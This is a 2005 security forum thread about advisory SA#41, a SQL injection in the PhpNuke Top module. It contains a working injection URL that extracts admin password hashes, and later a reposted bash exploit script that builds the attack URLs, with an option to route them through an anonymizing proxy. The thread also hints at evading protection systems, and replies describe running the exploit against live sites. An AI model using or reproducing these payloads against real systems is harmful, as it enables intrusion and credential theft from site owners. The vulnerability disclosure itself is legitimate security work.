Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
December 5, 2019
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 232
Members: 0
Total: 232
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> General discussion -> SA#41 - Critical Sql Injection in PhpNuke 6.x-7.6 Top module Goto page 1, 2  Next
Post new topic  Reply to topic View previous topic :: View next topic 
SA#41 - Critical Sql Injection in PhpNuke 6.x-7.6 Top module
PostPosted: Wed Apr 06, 2005 6:43 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




{================================================================================}
{ [waraxe-2005-SA#041] }
{================================================================================}
{ }
{ [ Critical Sql Injection in PhpNuke 6.x-7.6 Top module ] }
{ }
{================================================================================}

Author: Janek Vind "waraxe"
Date: 06. April 2005
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-41.html


Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Php-Nuke is a popular opensource content management system, written in php by
Francisco Burzi. This CMS is used on many thousands websites, because it's
freeware, easy to install and manage and has broad set of features.

Homepage: http://phpnuke.org


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Like title says, this time the sql injection security hole have been found in
phpnuke "Top" module. Lets look @ source code of the phpnuke 7.6 top module
index file (/modules/Top/index.php) ~ line 186:

[original source code]

/* Top 10 Polls */

$result8 = $db->sql_query("select * from ".$prefix."_poll_desc $queryplang");

if ($db->sql_numrows($result8)>0) {
echo "<table border=\"0\" cellpadding=\"10\" width=\"100%\"><tr><td align=\"left\">\n"
."<font class=\"option\"><b>$top "._VOTEDPOLLS."</b></font><br><br><font class=\"content\">\n";
$lugar = 1;

$result9 = sql_query("SELECT pollID, pollTitle, timeStamp, voters FROM ".$prefix."_poll_desc
$querylang order by voters DESC limit 0,$top", $dbi);

$counter = 0;

[/original source code]

And what's the problem? It appears, that variable "$querylang" is uninitialized. So, if we
will "poison" php variable space through GET/POST/COOKIE, then sql query manipulation is
possible.

[real life exploit]

http://localhost/nuke76/modules.php?name=Top&querylang=%20WHERE%201=2%20UNION
%20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors/*

[/real life exploit]


... and as result we can see md5 hashes of all the admin passwords in place, where normally
top 10 votes can be seen Smile
Of course, mysql version 4.x must be used with enabled union functionality. And if there are
Sentinel or similar protection systems installed, additional measures must be used to evade them.

Have a nice day!


How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

For help look @ http://www.waraxe.us/forums.html


Additional resources:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Free Base64 decoder and encoder - http://base64-encoder-online.waraxe.us/

SiteMapper - free php script for phpNuke powered websites -
newest version 0.4 can be downloaded @ http://sitemapper.waraxe.us/


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to LINUX, murdock, g0df4th3r, slimjim100, shai-tan, y3dips and
all other active members from my forum !

Special greets to Heintz - congrats about phpbb sploit finding !

Tervitused - Raido Kerna !

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------


Last edited by waraxe on Thu Jun 22, 2006 1:11 pm; edited 1 time in total
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Apr 06, 2005 7:10 pm Reply with quote
murdock
Advanced user
Advanced user
 
Joined: Mar 16, 2005
Posts: 54




Wooow Waraxe!!!!!! Nice one! Very Happy

I try it now immediatly!

Salut!
View user's profile Send private message
PostPosted: Wed Apr 06, 2005 9:57 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




By the way, i found this sql injection bug many time ago, somewhere november 2004, and had not published it yet. More than 3 month was passed but nobody has found that little security bug Laughing
Even worst, this bug exists even in very old nuke versions, maybe 5.x too, have not tested... Wink
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Apr 06, 2005 10:12 pm Reply with quote
murdock
Advanced user
Advanced user
 
Joined: Mar 16, 2005
Posts: 54




Jejeje, as we say in spain: "Lo bueno se hace esperar" Wink
(In english means: "Good things make you wait", or something like this Razz)
View user's profile Send private message
PostPosted: Thu Apr 07, 2005 7:31 am Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




there you go waraxe, step ahead to back on track

maybe u could input it on your SQLaxe library Laughing

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Thu Apr 07, 2005 10:22 pm Reply with quote
LINUX
Moderator
Moderator
 
Joined: May 24, 2004
Posts: 404
Location: Caiman




good work waraxe Smile
View user's profile Send private message Visit poster's website
PostPosted: Thu Apr 07, 2005 10:33 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Thanks, mate Very Happy

By the way - new advisory will come out somewhere next week and it will be not about phpnuke, but some other widely-used software Wink

So, stay tuned and check bugtraq and my forum Cool
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Apr 08, 2005 9:43 am Reply with quote
SteX
Advanced user
Advanced user
 
Joined: May 18, 2004
Posts: 181
Location: Serbia




keep working..

_________________

We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
-------------------------------------------------------
View user's profile Send private message
PostPosted: Fri Apr 08, 2005 12:12 pm Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




Thanks for mentioning my name lol.
A lot of sites have already had this problem fixed well before it went public.

Dial up is good for somethings. Specialy when my IP changes everytime I logon. Lets me not get effected by sentinal. lol

Thanks for the name mention. That makes me proud.

BTW I just got all my hair shaved off. So I look like a skin head. Laughing

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Fri Apr 08, 2005 12:28 pm Reply with quote
murdock
Advanced user
Advanced user
 
Joined: Mar 16, 2005
Posts: 54




Wow! My name is also mentioned! :_ )
Thanks waraxe!
View user's profile Send private message
PostPosted: Fri Apr 08, 2005 12:34 pm Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




Dam you Laughing

You got your name mention first Cool

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Fri Apr 08, 2005 2:15 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




shai-tan wrote:
Thanks for mentioning my name lol.
A lot of sites have already had this problem fixed well before it went public.

Dial up is good for somethings. Specialy when my IP changes everytime I logon. Lets me not get effected by sentinal. lol

Thanks for the name mention. That makes me proud.

BTW I just got all my hair shaved off. So I look like a skin head. Laughing



There are many restricting factors to be that exploit successful:

1. UNION functionality means that mysql engine must be > 4.x
2. there must be Top module activated
3. if there is not enough voted polls, sploit will not work

etc ...

But real-life tests will show, that there is a lots of phpnuke driven websites waiting for pach Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Apr 08, 2005 2:46 pm Reply with quote
murdock
Advanced user
Advanced user
 
Joined: Mar 16, 2005
Posts: 54




Here are the typical erros I get using this exploit:

Sometimes returns:

Code:
10 primeras encuestas m?s votadas

Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/.sites/117/site48/web/html/includes/sql_layer.php on line 414

10 autores m?s activos


Sometimes simply appears nothing:

Code:
10 primeras encuestas m?s votadas


10 autores m?s activos


And sometimes simply...works! Wink http://img8.exs.cx/my.php?loc=img8&image=sqlinjecttop2pl.jpg
View user's profile Send private message
PostPosted: Fri Apr 08, 2005 2:51 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Yes, that's it:

Case 1 - mysql 3.x without UNION functionality:

Code:
10 primeras encuestas m?s votadas

Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/.sites/117/site48/web/html/includes/sql_layer.php on line 414

10 autores m?s activos




case 2 - not enough votes or votes disabled:

Code:
10 primeras encuestas m?s votadas


10 autores m?s activos


And if you are lucky enough:

Quote:
http://img8.exs.cx/my.php?loc=img8&image=sqlinjecttop2pl.jpg


Very Happy
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Apr 08, 2005 8:08 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Look here for sploit derivation:

http://www.milw0rm.com/id.php?id=921

Code:

#/bin/bash

# This is just basic-ly modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1
# works thou /str0ke

#
# PHPNuke Top Module Remote SQL Injection
# by Fabrizi Andrea 2005
# andrea.fabrizi [at] gmail.com
#
# Work with the PHPNuke latest version! 
#

URL=$1;
PATH="$2/";
ANON="http://anonymouse.ws/cgi-bin/anon-www.cgi/";

        echo -e "\n PHPNuke Top Module Remote SQL Injection"
        echo -e " by Fabrizi Andrea 2005"

if [ "$URL" = "" ]; then
   echo -e "\n USAGE: $0 [URL] [NukePath]"
   echo -e " Example: $0 www.site.net phpNuke\n"
   exit
fi;

if [ $PATH = "/" ]; then PATH=""; fi;
#anon_query_url="$ANON""http://$URL/$PATH""modules.php?name=Top&querylang=union/**/%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1";
anon_query_url="$ANON""http://$URL/$PATH""modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1"; #changed line /str0ke

#query_url="http://$URL/$PATH""modules.php?name=Top&querylang=union/**/%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1";
query_url="http://$URL/$PATH""modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1"; #changed line /str0ke

echo -e "\n - Anonymous Query URL: "$anon_query_url "\n";
echo -e " - Direct Query URL: " $query_url "\n";
echo -e " - If this version of PHPNuke is vurnerable you can see the Admin's Passwords Hashes at the end of 'Most voted polls' List!\n"
# milw0rm.com [2005-04-07]


Nice one Very Happy
View user's profile Send private message Send e-mail Visit poster's website
SA#41 - Critical Sql Injection in PhpNuke 6.x-7.6 Top module
  www.waraxe.us Forum Index -> General discussion
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 2  
Goto page 1, 2  Next
  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






It book reviews
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.105 Seconds